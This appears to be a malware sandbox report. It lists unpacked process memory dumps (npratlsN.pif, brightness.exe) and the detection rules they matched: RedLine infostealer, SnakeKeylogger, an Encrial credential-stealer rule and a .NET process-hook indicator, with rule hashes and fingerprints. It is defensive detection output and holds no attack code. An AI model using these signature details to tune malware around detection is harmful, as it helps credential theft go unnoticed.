Source: 17.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.npratlsN.pif.2aa40000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1efb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.npratlsN.pif.2b0c0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.Nsltarpn.PIF.20f567a8.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.28129a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.2fd20ee8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.npratlsN.pif.2d639a06.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.npratlsN.pif.2aa40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 7.2.brightness.exe.218933d8.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1efb0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.3.npratlsN.pif.2b88cb18.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.brightness.exe.21800948.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.3.npratlsN.pif.1abebba8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.npratlsN.pif.28129a06.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.npratlsN.pif.1efb0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.npratlsN.pif.2d63a8ee.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.npratlsN.pif.2b0c0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.npratlsN.pif.2aa40ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.2.npratlsN.pif.1c7ca8ee.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 17.2.npratlsN.pif.2812a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 13.3.npratlsN.pif.1abebba8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1efb0ee8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 17.2.npratlsN.pif.2aa40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1c7c9a06.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1c7c9a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.3.npratlsN.pif.2b88cb18.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.npratlsN.pif.2fd20ee8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.npratlsN.pif.1f7f0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
